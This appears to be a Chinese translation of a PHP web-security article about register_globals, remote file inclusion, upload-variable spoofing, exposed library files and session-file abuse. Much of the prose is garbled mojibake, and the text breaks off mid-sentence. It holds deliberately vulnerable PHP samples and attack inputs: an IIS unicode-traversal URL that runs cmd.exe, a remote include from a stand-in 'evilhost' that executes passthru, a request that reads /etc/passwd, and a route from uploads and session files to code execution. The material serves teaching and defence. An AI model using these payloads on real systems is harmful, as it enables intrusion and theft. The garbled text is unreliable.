À´Ô´:Chinaasp
之所以译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP、PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题，原文可以在 http://www.securereality.com.au/studyinscarlet.txt 找到。
ÓÉÓÚÔÎıȽϳ¤£¬¶øÇÒÓÐÏaµ±Ò»²¿ÖÊǽeÉÜÎÄÕµı³¾°»oPHPµÄ»u´¡ÖªÊ¶£¬Ã»ÓÐÉae¼°µ½PHP°²È«½ÃaeµÄÄÚÈÝ£¬Òo´ËÎÒûÓÐÒe¡£Èç¹uÄaÏeÁ˽aÕa½ÃaeµÄ֪ʶ£¬Çe²Î¿¼ÔÎÄ¡£
ÎÄÕÂÖ÷Òª´ÓÈ«¾Ö±aÁ¿£¬Ô¶³ÌÎļþ£¬ÎļþÉÏÔØ£¬¿aÎļþ£¬SessionÎļþ£¬Êý¾ÝÀaÐͺÍÈÝÒ׳o´iµÄº¯ÊýÕa¼¸¸o½ÃaeÖÎoÁËPHPµÄ°²È«ÐÔ£¬²¢ÇÒ¶ÔÈçºÎÔoÇ¿PHPµÄ°²È«ÐÔÌa³oÁËÒ»Ð(C)ÓÐÓõĽ¨Òe¡£
ºÃÁË£¬*Ï»°ÉÙ˵£¬ÎÒÃÇÑÔ¹eÕý´«£¡
[全局变量]
PHPÖеıaÁ¿²»ÐeÒªÊÂÏÈÉuÃ÷£¬ËuÃÇ»aÔÚµÚÒ»´ÎʹÓÃʱ×Ô¶¯´´½¨£¬ËuÃǵÄÀaÐÍÒ²²»ÐeÒªÖ¸¶¨£¬ËuÃÇ»a¸u¾ÝÉÏÏÂÎÄ»¾³×Ô¶¯È¶¨¡£´Ó³ÌÐoÔ±µÄ½Ç¶ÈÀ´¿´£¬ÕaÎÞÒÉÊÇÒ»ÖÖ¼«Æa½±aµÄ´¦Ài½¨¡£ºÜÏÔÈ»£¬ÕaÒ²ÊÇ¿iËÙ¿ª¢ÓiÑÔµÄÒ»¸oºÜÓÐÓõÄÌصa¡£Ò»µ(C)Ò»¸o±aÁ¿±»´´½¨ÁË£¬¾Í¿ÉÒÔÔÚ³ÌÐoÖеÄÈκεØ*½Ê¹Óá£Õa¸oÌصaµ¼ÖµĽa¹u¾ÍÊdzÌÐoÔ±ºÜÉÙ³oʼ»¯±aÁ¿£¬±Ï¾¹£¬µ±ËuÃǵÚÒ»´Î´´½¨Ê±£¬ËuÃÇÊǿյġ£
ºÜÏÔÈ»£¬»uÓÚPHPµÄÓ¦ÓóÌÐoµÄÖ÷º¯ÊýÒ»°a¶¼ÊǽÓÊÜÓû§µÄÊaÈe£¨Ö÷ÒªÊDZiµ¥±aÁ¿£¬ÉÏÔØÎļþºÍCookieµÈ£(C)£¬È»ºo¶ÔÊaÈeÊý¾Ý½øÐд¦Ài£¬È»ºo°Ñ½a¹uµ»Øµ½¿Í»§¶Ëa¯ÀÀÆ÷¡£ÎªÁËʹPHP´uÂeÃÎÊÓû§µÄÊaÈe¾¡¿ÉÄÜÈÝÒ×£¬Êµ¼ÊÉÏPHPÊÇ°ÑÕaÐ(C)ÊaÈeÊý¾Ý¿´×÷È«¾Ö±aÁ¿À´´¦ÀiµÄ¡£
例如（原帖中的HTML表单在转载时丢失：它是一个 action 为"test.php"的表单，包含一个名为"hello"的文本框和一个提交按钮）：
很显然，这会显示一个文本框和提交按钮。当用户点击提交按钮时，"test.php"会处理用户的输入，当"test.php"运行时，"$hello"会包含用户在文本框输入的数据。从这里我们应该看出，攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用"test.php"，而是直接在浏览器地址栏输入 http://server/test.php?hello=hi&setup=no ，那么，不止是"$hello"被创建，"$setup"也被创建了。
ÒeÕß×¢£ºÕaÁ½ÖÖ½¨Ò²¾ÍÊÇÎÒÃÇͨ³£ËµµÄ¡°POST¡±ºÍ¡°GET¡±½¨¡£
ÏÂÃaeµÄÓû§ÈÏÖ¤´uÂe±(C)¶ÁËPHPµÄÈ«¾Ö±aÁ¿Ëuµ¼Öµİ²È«ÎÊÌa£º
<?php
// NOTE(review): intentionally vulnerable example, kept as-is because the surrounding
// text explains the flaw. $auth is never initialised before it is tested, so with
// register_globals=on a request such as test.php?auth=1 creates $auth=1 before this
// script runs and the password check is bypassed entirely.
// The usual fix is to initialise $auth = 0 ahead of the comparison and to read $pass
// from the request array rather than from an auto-created global.
if ($pass == "hello") {
    $auth = 1;
}
...
if ($auth == 1) {
    echo "some important information";
}
?>
上面的代码首先检查用户的密码是否为"hello"，如果匹配的话，设置"$auth"为"1"，即通过认证。之后如果"$auth"为"1"的话，就会显示一些重要信息。
表面看起来是正确的，而且我们中有相当一部分人是这样做的，但是这段代码犯了想当然的错误，它假定"$auth"在没有设置值的时候是空的，却没有想到攻击者可以创建任何全局变量并赋值，通过类似"http://server/test.php?auth=1"的请求，攻击者就可以欺骗这段代码，使它相信自己是已经认证过的。
Òo´Ë£¬ÎªÁËÌa¸ßPHP³ÌÐoµÄ°²È«ÐÔ£¬ÎÒÃDz»ÄÜÏaÐÅÈκÎûÓÐÃ÷ȶ¨ÒaµÄ±aÁ¿¡£Èç¹u³ÌÐoÖеıaÁ¿ºÜ¶aµÄ»°£¬Õa¿ÉÊÇÒ»Ïidz£¼e¾ÞµÄÈÎÎñ¡£
Ò»ÖÖ³£Óõı£»¤½Ê½¾ÍÊǼi²eÊý×eHTTP_GET[]»oPOST_VARS[]ÖеıaÁ¿£¬ÕaÒÀÀµÓÚÎÒÃǵÄÌa½»½Ê½£¨GET»oPOST£(C)¡£µ±PHPÅaÖÃΪ´o¿ª¡°track_vars¡±Ñ¡ÏiµÄ»°£¨ÕaÊÇȱʡֵ£(C)£¬Óû§Ìa½»µÄ±aÁ¿¾Í¿ÉÒÔÔÚÈ«¾Ö±aÁ¿ºÍÉÏÃaeÌaµ½µÄÊý×eÖлñµÃ¡£
µ«ÊÇÖµµÃ˵Ã÷µÄÊÇ£¬PHPÓÐËĸo²»Í¬µÄÊý×e±aÁ¿ÓÃÀ´´¦ÀiÓû§µÄÊaÈe¡£HTTP_GET_VARSÊý×eÓÃÀ´´¦ÀiGET½Ê½Ìa½»µÄ±aÁ¿£¬HTTP_POST_VARSÊý×eÓÃÓÚ´¦ÀiPOST½Ê½Ìa½»µÄ±aÁ¿£¬HTTP_COOKIE_VARSÊý×eÓÃÓÚ´¦Ài×÷ΪcookieÍÌa½»µÄ±aÁ¿£¬¶ø¶ÔÓÚHTTP_POST_FILESÊý×e£¨±È½ÏеÄPHP²ÅÌa¹(C)£(C)£¬ÔoÍeÈ«ÊÇÓû§ÓÃÀ´Ìa½»±aÁ¿µÄÒ»ÖÖ¿ÉÑ¡½Ê½¡£Óû§µÄÒ»¸oÇeÇo¿ÉÒÔºÜÈÝÒ׵İѱaÁ¿´aeÔÚÕaËĸoÊý×eÖУ¬Òo´ËÒ»¸o°²È«µÄPHP³ÌÐoÓ¦¸Ã¼i²eÕaËĸoÊý×e¡£
[远程文件]
PHPÊÇÒ»ÖÖ¾ßÓÐ*a¸»ÌØÐÔµÄÓiÑÔ£¬Ìa¹(C)ÁË´oÁ¿µÄº¯Êý£¬Ê¹±a³ÌÕßʵÏÖij¸o¹¦ÄܺÜÈÝÒס£µ«ÊÇ´Ó°²È«µÄ½Ç¶ÈÀ´¿´£¬¹¦ÄÜÔ½¶a£¬Òª±£Ö¤ËuµÄ°²È«ÐÔ¾ÍÔ½ÄÑ£¬Ô¶³ÌÎļþ¾ÍÊÇ˵Ã÷Õa¸oÎÊÌaµÄÒ»¸oºÜºÃµÄÀý×Ó£º
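<?php
// Opens the file named by $filename read-only and reports a failure to the client.
// Intentionally vulnerable: $filename is attacker-controlled (register_globals), and PHP's
// file functions also accept URLs, so this reads any local file or fetches a remote one.
// Listing repairs only: the if() parentheses are now balanced and the "\n" that had been
// split across two lines is restored; the vulnerable behaviour itself is unchanged.
if (!($fd = fopen("$filename", "r"))) {
    echo("Could not open file: $filename\n");
}
?>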
ÉÏÃaeµÄ½Å±¾ÊÔͼ´o¿ªÎļþ¡°$filename¡±£¬Èç¹uʧ°Ü¾ÍÏÔʾ´iÎoÐÅÏ¢¡£ºÜÃ÷ÏÔ£¬Èç¹uÎÒÃÇÄܹ»Ö¸¶¨¡°$filename¡±µÄ»°£¬¾ÍÄÜÀuÓÃÕa¸o½Å±¾a¯ÀÀϵͳÖеÄÈκÎÎļþ¡£µ«ÊÇ£¬Õa¸o½Å±¾»¹´aeÔÚÒ»¸o²»Ì«Ã÷ÏÔµÄÌØÐÔ£¬ÄǾÍÊÇËu¿ÉÒÔ´ÓÈκÎÆaËuWEB»oFTPÕ¾µa¶ÁÈ¡Îļþ¡£Êµ¼ÊÉÏ£¬PHPµÄ´o¶aÊýÎļþ´¦Àiº¯Êý¶ÔÔ¶³ÌÎļþµÄ´¦ÀiÊÇ͸Ã÷µÄ¡£
ÀýÈ磺
如果指定"$filename"为"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"
ÔoÉÏÃaeµÄ´uÂeʵ¼ÊÉÏÊÇÀuÓÃÖ÷»utargetÉϵÄunicodeÂ(C)¶´£¬Ö´ÐÐÁËdirÃuÁi¡£
ÕaʹµÃÖ§³ÖÔ¶³ÌÎļþµÄinclude()£¬require()£¬include_once()ºÍrequire_once()ÔÚÉÏÏÂÎÄ»*¾³ÖбaµÃ¸uÓÐȤ¡£ÕaÐ(C)º¯ÊýÖ÷Òª¹¦ÄÜÊÇ°uº¬Ö¸¶¨ÎļþµÄÄÚÈÝ£¬²¢ÇÒ°ÑËuÃÇ°´ÕÕPHP´uÂe½aÊÍ£¬Ö÷ÒªÊÇÓÃÔÚ¿aÎļþÉÏ¡£
ÀýÈ磺
<?php
// Pulls the language table in from the library directory. $libdir is expected to have
// been set earlier by the application; if it was not, register_globals lets the request
// supply it, and because include() accepts URLs the attacker can point it at a host he
// controls and have that host's file executed here.
include "$libdir/languages.php";
?>
ÉÏÀýÖС°$libdir¡±Ò»°aÊÇÒ»¸oÔÚÖ´ÐдuÂeÇ°ÒѾÉeÖúõľ¶£¬Èç¹u¹¥»÷ÕßÄܹ»Ê¹µÃ¡°$libdir¡±Ã»Óб»ÉeÖõĻ°£¬ÄÇôËu¾Í¿ÉÒԸıaÕa¸o¾¶¡£µ«Êǹ¥»÷Õß²¢²»ÄÜ×oÈκÎÊÂÇe£¬ÒoΪËuÃÇÖ»ÄÜÔÚËuÃÇÖ¸¶¨µÄ¾¶ÖÐÃÎÊÎļþlanguages.php£¨perlÖеġ°Poison null byte¡±¹¥»÷¶ÔPHPûÓÐ×÷Óã(C)¡£µ«ÊÇÓÉÓÚÓÐÁ˶ÔÔ¶³ÌÎļþµÄÖ§³Ö£¬¹¥»÷Õ߾ͿÉÒÔ×oÈκÎÊÂÇe¡£ÀýÈ磬¹¥»÷Õß¿ÉÒÔÔÚij̨þÎñÆ÷ÉÏÅÒ»¸oÎļþlanguages.php£¬°uº¬ÈçÏÂÄÚÈÝ£º
<?php
// Attacker-hosted languages.php. evilhost must serve this as plain text rather than
// execute it, so that the code runs on the target when the vulnerable include() fetches it.
passthru('/bin/ls /etc');
?>
然后把"$libdir"设置为"http://evilhost"。
ÐeҪעÒaµÄÊÇ£¬¹¥»÷þÎñÆ÷£¨Ò²¾ÍÊÇevilhost£(C)Ó¦¸Ã²»ÄÜÖ´ÐÐPHP´uÂe£¬ñÔo¹¥»÷´uÂe»aÔÚ¹¥»÷þÎñÆ÷£¬¶ø²»ÊÇÄ¿±eþÎñÆ÷Ö´ÐУ¬Èç¹uÄaÏeÁ˽a¾ßÌaµÄ¼¼Êoϸ½Ú£¬Çe²Î¿¼£ºhttp://www.securereality.com.au/sradv00006.txt
[文件上载]
PHP自动支持基于RFC 1867的文件上载，我们看下面的例子（原帖中的上载表单在转载时丢失：它包含一个名为"hello"的文件域、一个用于限制文件大小的 MAX_FILE_SIZE 隐藏域和一个提交按钮）：
ÉÏÃaeµÄ´uÂeÈÃÓû§´Ó±¾µØ»uÆ÷Ñ¡ÔñÒ»¸oÎļþ£¬µ±µa»÷Ìa½»ºo£¬Îļþ¾Í»a±»ÉÏÔص½þÎñÆ÷¡£ÕaÏÔÈ»ÊǺÜÓÐÓõŦÄÜ£¬µ«ÊÇPHPµÄÏiÓ¦½Ê½Ê¹ÕaÏi¹¦ÄܱaµÄ²»°²È«¡£µ±PHPµÚÒ»´Î½Óµ½ÕaÖÖÇeÇo£¬ÉoÖÁÔÚËu¿ªÊ¼½aÎo±»µ÷ÓõÄPHP´uÂe֮ǰ£¬Ëu»aÏȽÓÊÜÔ¶³ÌÓû§µÄÎļþ£¬¼i²eÎļþµÄ³¤¶ÈÊÇ*ñ³¬¹ý¡°$MAX_FILE_SIZE variable¡±¶¨ÒaµÄÖµ£¬Èç¹uͨ¹ýÕaÐ(C)²aÊԵĻ°£¬Îļþ¾Í»a±»´aeÔÚ±¾µØµÄÒ»¸oÁÙʱĿ¼ÖС£
Òo´Ë£¬¹¥»÷Õß¿ÉÒÔ¢ËÍÈÎÒaÎļþ¸øÔËÐÐPHPµÄÖ÷»u£¬ÔÚPHP³ÌÐo»¹Ã»Óоo¶¨ÊÇñ½ÓÊÜÎļþÉÏÔØʱ£¬ÎļþÒѾ±»´aeÔÚ*þÎñÆ÷ÉÏÁË¡£
ÕaÀiÎҾͲ»ÌÖÂÛÀuÓÃÎļþÉÏÔØÀ´¶Ô*þÎñÆ÷½øÐÐDOS¹¥»÷µÄ¿ÉÄÜÐÔÁË¡£
ÈÃÎÒÃÇ¿¼ÂÇһϴ¦ÀiÎļþÉÏÔصÄPHP³ÌÐo£¬ÕýÈçÎÒÃÇÉÏÃae˵µÄ£¬Îļþ±»½ÓÊÕ²¢ÇÒ´aeÔÚþÎñÆ÷ÉÏ£¨Î»ÖÃÊÇÔÚÅaÖÃÎļþÖÐÖ¸¶¨µÄ£¬Ò»°aÊÇ/tmp£(C)£¬À(C)Õ¹ÃuÒ»°aÊÇËae»uµÄ£¬ÀaËÆ¡°phpxXuoXG¡±µÄÐÎʽ¡£PHP³ÌÐoÐeÒªÉÏÔØÎļþµÄÐÅÏ¢ÒÔ±a´¦ÀiËu£¬Õa¿ÉÒÔͨ¹ýÁ½Öֽʽ£¬Ò»ÖֽʽÊÇÔÚPHP 3ÖÐÒѾʹÓõģ¬ÁiÒ»ÖÖÊÇÔÚÎÒÃǶÔÒÔÇ°µÄ½*¨Ìa³o°²È«¹«¸aeºoÒýÈeµÄ¡£
µ«ÊÇ£¬ÎÒÃÇ¿ÉÒԿ϶¨µÄ˵£¬ÎÊÌa»¹ÊÇ´aeÔڵģ¬´o¶aÊýPHP³ÌÐo»¹ÊÇʹÓÃÀϵÄ*½Ê½À´´¦ÀiÉÏÔØÎļþ¡£PHPÉeÖÃÁËËĸoÈ«¾Ö±aÁ¿À´ÃeÊoÉÏÔØÎļþ£¬±ÈÈç˵ÉÏÃaeµÄÀý×Ó£º
$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g "c:\temp\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")
È»ºoPHP³ÌÐo¿ªÊ¼´¦Ài¸u¾Ý¡°$hello¡±Ö¸¶¨µÄÎļþ£¬ÎÊÌaÔÚÓÚ¡°$hello¡±²»Ò»¶¨ÊÇÒ»¸oPHPÉeÖõıaÁ¿£¬ÈκÎÔ¶³ÌÓû§¶¼¿ÉÒÔÖ¸¶¨Ëu¡£Èç¹uÎÒÃÇʹÓÃÏÂÃaeµÄ*½Ê½£º
http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt
¾Íµ¼ÖÂÁËÏÂÃaeµÄPHPÈ«¾Ö±aÁ¿£¨µ±È»POST*½Ê½Ò²¿ÉÒÔ£¨ÉoÖÁÊÇCookie£(C)£(C)£º
$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"
ÉÏÃaeµÄ±iµ¥Êý¾ÝÕýºÃÂu×aÁËPHP³ÌÐoËuÆÚÍuµÄ±aÁ¿£¬µ«ÊÇÕaʱPHP³ÌÐo²»ÔÙ´¦ÀiÉÏÔصÄÎļþ£¬¶øÊÇ´¦Ài¡°/etc/passwd¡±£¨Í¨³£»aµ¼ÖÂÄÚÈݱ(C)¶£(C)¡£ÕaÖÖ¹¥»÷¿ÉÒÔÓÃÓÚ±(C)¶ÈκÎÃo¸ÐÎļþµÄÄÚÈÝ¡£
ÎÒÔÚÇ°ÃaeÒѾ˵ÁË£¬Ð°ae±¾µÄPHPʹÓÃHTTP_POST_FILES[]À´¾o¶¨ÉÏÔØÎļþ£¬Í¬Ê±Ò²Ìa¹(C)Á˺ܶaº¯ÊýÀ´½a¾oÕa¸oÎÊÌa£¬ÀýÈçÓÐÒ»¸oº¯ÊýÓÃÀ´ÅжÏij¸oÎļþÊDz»ÊÇʵ¼ÊÉÏÔصÄÎļþ¡£ÕaÐ(C)º¯ÊýºÜºÃµÄ½a¾oÁËÕa¸oÎÊÌa£¬µ«ÊÇʵ¼ÊÉϿ϶¨ÓкܶaPHP³ÌÐoÈÔȻʹÓþɵĽ¨£¬ºÜÈÝÒ×Êܵ½ÕaÖÖ¹¥»÷¡£
×÷ΪÎļþÉÏÔصĹ¥»÷½¨µÄÒ»¸o±aÖÖ£¬ÎÒÃÇ¿´Ò»ÏÂÏÂÃaeµÄÒ»¶Î´uÂe£º
<?php
// Loads a theme file only if it exists on the local filesystem. The existence check keeps
// remote URLs out but does nothing about local paths: anyone who controls $theme can
// include any readable file, including one he has just uploaded (PHP writes the upload
// to a temp file before the script runs, and with register_globals a form field named
// "theme" sets $theme to that temp path).
if (file_exists($theme)) {
    include $theme;
}
?>
Èç¹u¹¥»÷Õß¿ÉÒÔ¿ØÖÆ¡°$theme¡±µÄ»°£¬ºÜÏÔÈ»Ëu¿ÉÒÔÀuÓá°$theme¡±À´¶ÁÈ¡Ô¶³ÌϵͳÉϵÄÈκÎÎļþ¡£¹¥»÷ÕßµÄ×iÖÕÄ¿±eÊÇÔÚÔ¶³ÌþÎñÆ÷ÉÏÖ´ÐÐÈÎÒaÖ¸Ái£¬µ«ÊÇËuÎިʹÓÃÔ¶³ÌÎļþ£¬Òo´Ë£¬Ëu±ØÐeµÃÔÚÔ¶³Ì*þÎñÆ÷ÉÏ´´½¨Ò»¸oPHPÎļþ¡£ÕaÕ§¿´ÆðÀ´ºÃÏoÊDz»¿ÉÄܵģ¬µ«ÊÇÎļþÉÏÔØ°iÁËÎÒÃÇÕa¸o棬Èç¹u¹¥»÷ÕßÏÈÔÚ±¾µØ»uÆ÷ÉÏ´´½¨Ò»¸o°uº¬PHP´uÂeµÄÎļþ£¬È»ºo´´½¨Ò»¸o°uº¬ÃuΪ¡°theme¡±µÄÎļþÓoµÄ±iµ¥£¬×iºoÓÃÕa¸o±iµ¥Í¨¹ýÎļþÉÏÔØ°Ñ´´½¨µÄ°uº¬PHP´uÂeµÄÎļþÌa½»¸øÉÏÃaeµÄ´uÂe£¬PHP¾Í»a°Ñ¹¥»÷ÕßÌa½»µÄÎļþ±£´aeÆðÀ´£¬²¢°Ñ¡°$theme¡±µÄÖµÉeÖÃΪ¹¥»÷ÕßÌa½»µÄÎļþ£¬ÕaÑufile_exists()º¯Êý»a¼i²eͨ¹ý£¬¹¥»÷ÕߵĴuÂeÒ²½«Ö´ÐС£
»ñµÃÖ´ÐÐÈÎÒaÖ¸ÁiµÄÄÜÁ¦Ö®ºo£¬¹¥»÷ÕßÏÔÈ»ÏeÌaÉýȨÏÞ»oÕßÊÇÀ(C)´oÕ½¹u£¬¶øÕaÓÖÐeÒªÒ»Ð(C)þÎñÆ÷ÉÏûÓеŤ¾ß¼¯£¬¶øÎļþÉÏÔØÓÖÒ»´Î°iÁËÎÒÃÇÕa¸oæ¡£¹¥»÷Õß¿ÉÒÔʹÓÃÎļþÉÏÔع¦ÄÜÉÏÔع¤¾ß£¬°ÑËýÃÇ´aeÔÚþÎñÆ÷ÉÏ£¬È»ºoÀuÓÃËuÃÇÖ´ÐÐÖ¸ÁiµÄÄÜÁ¦£¬Ê¹ÓÃchmod()¸Ä±aÎļþµÄȨÏÞ£¬È»ºoÖ´ÐС£ÀýÈ磺¹¥»÷Õß¿ÉÒÔÈƹý*À»ðǽ»oIDSÉÏÔØÒ»¸o±¾µØroot¹¥»÷³ÌÐo£¬È»ºoÖ´ÐУ¬ÕaÑu¾Í»ñµÃÁËrootȨÏÞ¡£
[库文件]
ÕýÈçÎÒÃÇÇ°ÃaeÌÖÂÛµÄÄÇÑu£¬include()ºÍrequire()Ö÷ÒªÊÇΪÁËÖ§³Ö´uÂe¿a£¬ÒoΪÎÒÃÇÒ»°aÊÇ°ÑÒ»Ð(C)¾³£Ê¹Óõĺ¯Êý*ŵ½Ò»¸o¶ÀÁ¢µÄÎļþÖУ¬Õa¸o¶ÀÁ¢µÄÎļþ¾ÍÊÇ´uÂe¿a£¬µ±ÐeҪʹÓÃÆaÖеĺ¯Êýʱ£¬ÎÒÃÇÖ»Òª°ÑÕa¸o´uÂe¿a°uº¬µ½µ±Ç°µÄÎļþÖоͿÉÒÔÁË¡£
×i³o£¬ÈËÃÇ¿ª¢ºÍ¢²¼PHP³ÌÐoµÄʱºo£¬ÎªÁËÇø±ð´uÂe¿aºÍÖ÷³ÌÐo´uÂe£¬Ò»°aÊÇΪ´uÂe¿aÎļþÉeÖÃÒ»¸o¡°.inc¡±µÄÀ(C)Õ¹Ãu£¬µ«ÊÇËuÃǺܿi¢ÏÖÕaÊÇÒ»¸o´iÎo£¬ÒoΪÕaÑuµÄÎļþÎÞ¨±»PHP½aÊÍÆ÷ÕýȽaÎoΪPHP´uÂe¡£Èç¹uÎÒÃÇÖ±½ÓÇeÇoþÎñÆ÷ÉϵÄÕaÖÖÎļþʱ£¬ÎÒÃǾͻaµÃµ½¸ÃÎļþµÄÔ´´uÂe£¬ÕaÊÇÒoΪµ±°ÑPHP×÷ΪApacheµÄÄ£¿eʹÓÃʱ£¬PHP½aÊÍÆ÷ÊǸu¾ÝÎļþµÄÀ(C)Õ¹ÃuÀ´¾o¶¨ÊÇ*ñ½aÎoΪPHP´uÂeµÄ¡£À(C)Õ¹ÃuÊÇÕ¾µa¹ÜÀiÔ±Ö¸¶¨µÄ£¬Ò»°aÊÇ¡°.php¡±£¬ ¡°.php3¡±ºÍ¡°.php4¡±¡£Èç¹uÖØÒªµÄÅaÖÃÊý¾Ý±»°uº¬ÔÚûÓкÏÊʵÄÀ(C)Õ¹ÃuµÄPHPÎļþÖУ¬ÄÇôԶ³Ì¹¥»÷ÕߺÜÈÝÒ׵õ½ÕaÐ(C)ÐÅÏ¢¡£
×i¼oµ¥µÄ½a¾o½¨¾ÍÊǸøÿ¸oÎļþ¶¼Ö¸¶¨Ò»¸oPHPÎļþµÄÀ(C)Õ¹Ãu£¬ÕaÑu¿ÉÒԺܺõÄÀֹй¶Դ´uÂeµÄÎÊÌa£¬µ«ÊÇÓÖ²uÉuÁËеÄÎÊÌa£¬Í¨¹ýÇeÇoÕa¸oÎļþ£¬¹¥»÷Õß¿ÉÄÜʹ±¾¸ÃÔÚÉÏÏÂÎÄ»¾³ÖÐÔËÐеĴuÂe¶ÀÁ¢ÔËÐУ¬Õa¿ÉÄܵ¼ÖÂÇ°ÃaeÌÖÂÛµÄÈ«²¿¹¥»÷¡£
ÏÂÃaeÊÇÒ»¸oºÜÃ÷ÏÔµÄÀý×Ó£º
In main.php:
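<?php
// main.php: fixes the library paths and then loads the language loader.
// Two listing errors corrected: the variable was assigned as $libDir but read as $libdir
// (PHP variable names are case-sensitive, so "$libdir/languages" was built from an unset
// variable), and the include() call was closed with ":" instead of ")".
$libdir = "/libdir";
$langDir = "$libdir/languages";
...
include("$libdir/loadlanguage.php");
?>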
In libdir/loadlanguage.php:
<?php
...
// Safe only when reached through main.php, which sets $langDir first. Because this file
// has a .php extension it can be requested directly, and then both $langDir and
// $userLang come straight from the request (register_globals), making this an
// arbitrary-file include.
include $langDir . "/" . $userLang;
?>
µ±¡°libdir/loadlanguage.php¡±±»¡°main.php¡±µ÷ÓÃʱÊÇÏaµ±°²È«µÄ£¬µ«ÊÇÒoΪ¡°libdir/loadlanguage¡±¾ßÓС°.php¡±µÄÀ(C)Õ¹Ãu£¬Òo´ËÔ¶³Ì¹¥»÷Õß¿ÉÒÔÖ±½ÓÇeÇoÕa¸oÎļþ£¬²¢ÇÒ¿ÉÒÔÈÎÒaÖ¸¶¨¡°$langDir¡±ºÍ¡°$userLang¡±µÄÖµ¡£
[Session文件]
PHP 4»o¸uеİae±¾Ìa¹(C)Á˶ÔsessionsµÄÖ§³Ö£¬ËuµÄÖ÷Òª×÷ÓÃÊÇÔÚPHP³ÌÐoÖб£´aeÒ³ÓeÒ³Ö®¼aµÄ״̬ÐÅÏ¢¡£ÀýÈ磬µ±Ò»¸oÓû§µÇ½½øÈeÍøÕ¾£¬ËuµÇ½ÁËÕa¸oÊÂʵÒÔ¼°ËµÇ½½øÈeÕa¸oÍøÕ¾¶¼±»±£´aeÔÚsessionÖУ¬µ±ËuÔÚÍøÕ¾Öе½´¦a¯ÀÀʱ£¬ËuÓеÄPHP´uÂe¶¼¿ÉÒÔ»ñµÃÕaÐ(C)״̬ÐÅÏ¢¡£
ÊÂʵÉÏ£¬µ±Ò»¸osessionÆo¶¯Ê±£¨Êµ¼ÊÉÏÊÇÔÚÅaÖÃÎļþÖÐÉeÖÃΪÔÚµÚÒ»´ÎÇeÇoʱ×Ô¶¯Æo¶¯£(C)£¬¾Í»aÉu³ÉÒ»¸oËae»uµÄ¡°session id¡±£¬Èç¹uÔ¶³Ìa¯ÀÀÆ÷×ÜÊÇÔÚ*¢ËÍÇeÇoʱÌa½»Õa¸o¡°session id¡±µÄ»°£¬session¾Í»aÒ»Ö±±£³Ö¡£Õaͨ¹ýCookieºÜÈÝÒ×ʵÏÖ£¬Ò²¿ÉÒÔͨ¹ýÔÚÿҳÌa½»Ò»¸o±iµ¥±aÁ¿£¨°uº¬¡°session id¡±£(C)À´ÊµÏÖ¡£PHP³ÌÐo¿ÉÒÔÓÃsession×¢²aÒ»¸oÌØÊaµÄ±aÁ¿£¬ËuµÄÖµ»aÔÚÿ¸oPHP½Å±¾½aÊøºo´aeÔÚsessionÎļþÖУ¬Ò²»aÔÚÿ¸oPHP½Å±¾¿ªÊ¼Ç°¼ÓÔص½±aÁ¿ÖС£ÏÂÃaeÊÇÒ»¸o¼oµ¥µÄÀý×Ó£º
<?php
// Starts a fresh session holding one registered variable. session_register() binds the
// global $session_auth to the session, so later scripts receive the value "shaun"
// automatically. (session_register() was removed in PHP 5.4; modern code uses $_SESSION.)
session_destroy();                 // discard whatever the current session held
$session_auth = 'shaun';
session_register('session_auth');  // persist $session_auth across requests
?>
аae±¾µÄPHP¶¼»a×Ô¶¯°Ñ¡°$session_auth¡±µÄÖµÉeÖÃΪ¡°shaun¡±£¬Èç¹uËuÃDZ»Ð޸ĵĻ°£¬ÒÔºoµÄ½Å±¾¶¼»a×Ô¶¯½ÓÊÜÐ޸ĺoµÄÖµ£¬Õa¶ÔÎÞ״̬µÄWebÀ´ËµµÄÈ*ÊÇÖֺܲ»´iµÄ¹¤¾ß£¬µ«ÊÇÎÒÃÇÒ²Ó¦¸ÃСÐÄ¡£
Ò»¸oºÜÃ÷ÏÔµÄÎÊÌa¾ÍÊÇȱ£±aÁ¿µÄÈÀ´×Ôsession£¬ÀýÈ磬¸ø¶¨ÉÏÃaeµÄ´uÂe£¬Èç¹uºoÐøµÄ½Å±¾ÊÇÏÂÃaeÕaÑuµÄ»°£º
<?php
// Intentionally vulnerable: this assumes a non-empty $session_auth can only have come
// from the session. Until the variable has actually been registered in the session,
// register_globals lets an ordinary form/GET parameter named session_auth satisfy it.
if (!empty($session_auth)) {
    // Grant access to site here
}
?>
ÉÏÃaeµÄ´uÂe¼Ù¶¨Èç¹u¡°$session_auth¡±±»ÖÃλµÄ»°£¬¾ÍÊÇ´Ósession£¬¶ø²»ÊÇ´ÓÓû§ÊaÈeÀ´ÖÃλµÄ£¬Èç¹u¹¥»÷Õßͨ¹ý±iµ¥ÊaÈeÀ´ÖÃλµÄ»°£¬Ëu¾Í¿ÉÒÔ»ñµÃ¶ÔÕ¾µaµÄÃÎÊȨ¡£×¢Òa¹¥»÷Õß±ØÐeÔÚsession×¢²a¸Ã±aÁ¿Ö®Ç°Ê¹ÓÃÕaÖÖ¹¥»÷½¨£¬Ò»µ(C)±aÁ¿±»Å½øÁËsession£¬¾Í»a¸²¸ÇÈκαiµ¥ÊaÈe¡£
SessionÊý¾ÝÒ»°aÊDZ£´aeÔÚÎļþÖУ¨Î»ÖÃÊÇ¿ÉÅaÖõģ¬Ò»°aÊÇ¡°/tmp¡±£(C)£¬ÎļþÃuÒ»°aÊÇÀaËÆ¡°sess_
Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方。对于上面的例子来说，攻击者需要在远程系统放置一个包含PHP代码的文件，如果不能利用文件上载做到的话，他通常会利用session为一个变量按照自己的意愿赋一个值，然后猜测session文件的位置，而他知道文件名的形式（见上文，"sess_<session id>"），于是就可以把这个session文件include进来。
